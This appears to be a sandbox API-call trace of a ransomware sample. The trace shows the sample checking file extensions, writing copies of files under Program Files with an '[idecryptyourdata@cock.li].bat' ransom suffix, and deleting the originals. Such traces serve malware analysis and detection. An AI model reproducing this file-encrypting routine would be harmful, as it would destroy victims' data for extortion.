[0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.624] lstrlenW (lpString=".1cd") returned 4 [0055.624] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.624] lstrlenW (lpString=".jpg") returned 4 [0055.624] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.625] lstrlenW (lpString=".doc") returned 4 [0055.625] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString=".docx") returned 5 [0055.625] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.625] lstrlenW (lpString=".pdf") returned 4 [0055.625] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString=".xls") returned 4 [0055.625] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString=".xlsx") returned 5 [0055.625] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.625] lstrlenW (lpString=".ppt") returned 4 [0055.625] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.625] lstrlenW (lpString=".zip") returned 4 [0055.625] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.625] lstrlenW (lpString=".rar") returned 4 [0055.625] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString=".bz2") returned 4 [0055.625] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString=".7z") returned 3 [0055.625] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.625] lstrlenW (lpString=".dbf") returned 4 [0055.625] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.625] lstrlenW (lpString=".1cd") returned 4 [0055.625] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.625] lstrlenW (lpString=".jpg") returned 4 [0055.625] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.626] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.626] lstrlenW (lpString="keypad.xml") returned 10 [0055.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.626] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=693) returned 1 [0055.626] CloseHandle (hObject=0x2c4) returned 1 [0055.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0x20 [0055.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.626] lstrlenW (lpString=".doc") returned 4 [0055.627] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString=".docx") returned 5 [0055.627] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0055.627] lstrlenW (lpString=".pdf") returned 4 [0055.627] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString=".xls") returned 4 [0055.627] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString=".xlsx") returned 5 [0055.627] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0055.627] lstrlenW (lpString=".ppt") returned 4 [0055.627] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.627] lstrlenW (lpString=".zip") returned 4 [0055.627] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.627] lstrlenW (lpString=".rar") returned 4 [0055.627] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString=".bz2") returned 4 [0055.627] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString=".7z") returned 3 [0055.627] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.627] lstrlenW (lpString=".dbf") returned 4 [0055.627] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.627] lstrlenW (lpString=".1cd") returned 4 [0055.627] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.627] lstrlenW (lpString=".jpg") returned 4 [0055.627] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.628] lstrlenW (lpString=".doc") returned 4 [0055.628] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString=".docx") returned 5 [0055.628] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0055.628] lstrlenW (lpString=".pdf") returned 4 [0055.628] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString=".xls") returned 4 [0055.628] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString=".xlsx") returned 5 [0055.628] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0055.628] lstrlenW (lpString=".ppt") returned 4 [0055.628] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.628] lstrlenW (lpString=".zip") returned 4 [0055.628] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.628] lstrlenW (lpString=".rar") returned 4 [0055.628] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString=".bz2") returned 4 [0055.628] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString=".7z") returned 3 [0055.628] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.628] lstrlenW (lpString=".dbf") returned 4 [0055.628] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.628] lstrlenW (lpString=".1cd") returned 4 [0055.628] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0055.628] lstrlenW (lpString=".jpg") returned 4 [0055.628] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.628] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.629] lstrlenW (lpString="base.xml") returned 8 [0055.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.629] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3333) returned 1 [0055.630] CloseHandle (hObject=0x2c4) returned 1 [0055.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0x20 [0055.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0055.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0055.630] lstrlenW (lpString=".doc") returned 4 [0055.630] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.630] lstrlenW (lpString=".docx") returned 5 [0055.630] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.630] lstrlenW (lpString=".pdf") returned 4 [0055.630] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.630] lstrlenW (lpString=".xls") returned 4 [0055.630] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.630] lstrlenW (lpString=".xlsx") returned 5 [0055.630] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.630] lstrlenW (lpString=".ppt") returned 4 [0055.630] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0055.630] lstrlenW (lpString=".zip") returned 4 [0055.630] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.630] lstrlenW (lpString=".rar") returned 4 [0055.630] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.630] lstrlenW (lpString=".bz2") returned 4 [0055.630] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.630] lstrlenW (lpString=".7z") returned 3 [0055.630] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.630] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0055.630] lstrlenW (lpString=".dbf") returned 4 [0055.630] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.411] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0056.913] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.913] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.913] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0056.913] GetLastError () returned 0x0 [0056.913] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1e7d, lpOverlapped=0x0) returned 1 [0056.984] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1e80, lpOverlapped=0x0) returned 1 [0056.985] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0056.985] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0056.985] SetEndOfFile (hFile=0x358) returned 1 [0056.986] CloseHandle (hObject=0x358) returned 1 [0056.987] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0056.987] SetEndOfFile (hFile=0x354) returned 1 [0056.988] CloseHandle (hObject=0x354) returned 1 [0056.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.988] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 1 [0056.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.989] lstrlenW (lpString=".doc") returned 4 [0056.989] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.989] lstrlenW (lpString=".docx") returned 5 [0056.989] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0056.989] lstrlenW (lpString=".pdf") returned 4 [0056.989] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.989] lstrlenW (lpString=".xls") returned 4 [0056.989] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.989] lstrlenW (lpString=".xlsx") returned 5 [0056.989] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0056.989] lstrlenW (lpString=".ppt") returned 4 [0056.989] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.989] lstrlenW (lpString=".zip") returned 4 [0056.989] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.989] lstrlenW (lpString=".rar") returned 4 [0056.989] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.989] lstrlenW (lpString=".bz2") returned 4 [0056.989] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.989] lstrlenW (lpString=".7z") returned 3 [0056.989] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.989] lstrlenW (lpString=".dbf") returned 4 [0056.989] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.989] lstrlenW (lpString=".1cd") returned 4 [0056.989] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.990] lstrlenW (lpString=".jpg") returned 4 [0056.990] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.990] lstrlenW (lpString=".doc") returned 4 [0056.990] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.990] lstrlenW (lpString=".docx") returned 5 [0056.990] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0056.990] lstrlenW (lpString=".pdf") returned 4 [0056.990] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.990] lstrlenW (lpString=".xls") returned 4 [0056.990] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.990] lstrlenW (lpString=".xlsx") returned 5 [0056.990] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0056.990] lstrlenW (lpString=".ppt") returned 4 [0056.990] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.990] lstrlenW (lpString=".zip") returned 4 [0056.990] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.990] lstrlenW (lpString=".rar") returned 4 [0056.990] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.990] lstrlenW (lpString=".bz2") returned 4 [0056.990] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.990] lstrlenW (lpString=".7z") returned 3 [0056.990] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.990] lstrlenW (lpString=".dbf") returned 4 [0056.990] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.990] lstrlenW (lpString=".1cd") returned 4 [0056.991] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0056.991] lstrlenW (lpString=".jpg") returned 4 [0056.991] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.991] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.991] lstrlenW (lpString="win32_MoveNoDrop32x32.gif") returned 25 [0056.991] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.003] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=153) returned 1 [0057.003] CloseHandle (hObject=0x354) returned 1 [0057.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif")) returned 0x20 [0057.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.004] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.004] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.004] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.004] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0057.005] GetLastError () returned 0x0 [0057.005] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x99, lpOverlapped=0x0) returned 1 [0057.007] WriteFile (in: hFile=0x2e4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xa0, lpOverlapped=0x0) returned 1 [0057.008] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0057.008] WriteFile (in: hFile=0x2e4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x106, lpOverlapped=0x0) returned 1 [0057.008] SetEndOfFile (hFile=0x2e4) returned 1 [0057.016] CloseHandle (hObject=0x2e4) returned 1 [0057.017] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.017] SetEndOfFile (hFile=0x354) returned 1 [0057.018] CloseHandle (hObject=0x354) returned 1 [0057.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.018] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movenodrop32x32.gif")) returned 1 [0057.018] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.018] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.018] lstrlenW (lpString=".doc") returned 4 [0057.018] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0057.019] lstrlenW (lpString=".docx") returned 5 [0057.019] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0057.019] lstrlenW (lpString=".pdf") returned 4 [0057.019] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0057.019] lstrlenW (lpString=".xls") returned 4 [0057.019] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0057.019] lstrlenW (lpString=".xlsx") returned 5 [0057.019] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0057.019] lstrlenW (lpString=".ppt") returned 4 [0057.019] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0057.019] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.019] lstrlenW (lpString=".zip") returned 4 [0057.019] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0057.019] lstrlenW (lpString=".rar") returned 4 [0057.019] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0057.019] lstrlenW (lpString=".bz2") returned 4 [0057.019] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0057.019] lstrlenW (lpString=".7z") returned 3 [0057.019] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0057.019] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.019] lstrlenW (lpString=".dbf") returned 4 [0057.019] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0057.019] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.019] lstrlenW (lpString=".1cd") returned 4 [0057.019] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0057.019] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.019] lstrlenW (lpString=".jpg") returned 4 [0057.019] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0057.020] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.020] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 